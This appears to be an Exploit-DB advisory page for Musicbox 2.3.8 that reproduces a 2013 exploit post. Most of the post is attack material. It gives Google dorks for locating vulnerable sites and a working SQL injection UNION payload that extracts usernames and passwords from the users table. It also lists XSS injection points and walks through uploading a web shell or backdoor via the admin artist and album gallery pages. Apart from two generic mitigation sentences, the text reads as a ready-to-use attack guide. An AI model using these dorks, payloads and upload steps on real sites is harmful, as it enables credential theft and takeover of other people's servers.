Musicbox 2.3.8 Multiple Vulnerabilities

vendor:

Musicbox

by:

DevilScreaM

7,5

CVSS

HIGH

SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability

89, 79, 264

CWE

Product Name: Musicbox

Affected Version From: 1.0

Affected Version To: 2.3.8

Patch Exists: NO

Related CWE: N/A

CPE: a:musicboxv2:musicbox

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 32 Bit (Mozila & Chrome)

2013

Musicbox 2.3.8 Multiple Vulnerabilities

Musicbox 2.3.8 is vulnerable to SQL Injection, XSS and Shell Upload. An attacker can exploit these vulnerabilities by sending malicious payloads to the vulnerable parameters. For SQL Injection, the vulnerable parameter is 'id' in the URL 'genre_albums.php?id=[SQLI]'. For XSS, the vulnerable parameters are 'term' and 'details' in the URL 'index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0' and 'member.php?uname=[YOUR_USERNAME]'. For Shell Upload, the vulnerable parameter is 'action' in the URL 'admin/adminpanel.php?action=artistgallery'. An attacker can upload a malicious shell/backdoor and access it via 'images/artist/shell.php'.

Mitigation:

Input validation should be done on the server-side to prevent malicious payloads from being sent to the vulnerable parameters. Access to the admin panel should be restricted to trusted users only.

Source

Exploit-DB raw data:

#Exploit Title 		: Musicbox 2.3.8 Multiple Vulnerabilities
#Author 		: DevilScreaM
#Date   		: 25/08/2013
#Category		: Web Applications 
#Vendor                 : http://www.musicboxv2.com/
#Version 		: 1.0 - 2.3.8

#Dork   	
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008 
inurl:genre_albums.php?id=

#Vulnerability  	: SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability 
#Tested On 		: Windows 7 32 Bit (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id
 

SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go To Fiture Search

2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search

3. See Result

or See with URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0


========================================================================================

*News Profile

1. Register To Website or go to link http://site-target/register.php

2. Login to Website

3. Go to Menu [ My News ]

4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>

And at Detials input your XSS or Text

See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://server/musicbox/member.php?uname=devilscream


==========================================================================================

Shell Upload Vulnerability 

*Artist Galery

1. Go to Admin Page, And Login

2. Go to Upload Artist Image or Go to Link

http://site-target/admin/adminpanel.php?action=artistgallery

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At 

http://site-target/artist_gallery/Your_Backdoor.php


============================================================================================

*Album Galery

1. Go to Admin Page, And Login

2. Go to Upload Album Image or Go to Link

http://site-target/admin/adminpanel.php?action=albumgallery

3. Select Option, Example Option "All Album", And Click Submit

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At 

http://site-target/album_gallery/Your_Backdoor.php


==========================================================================================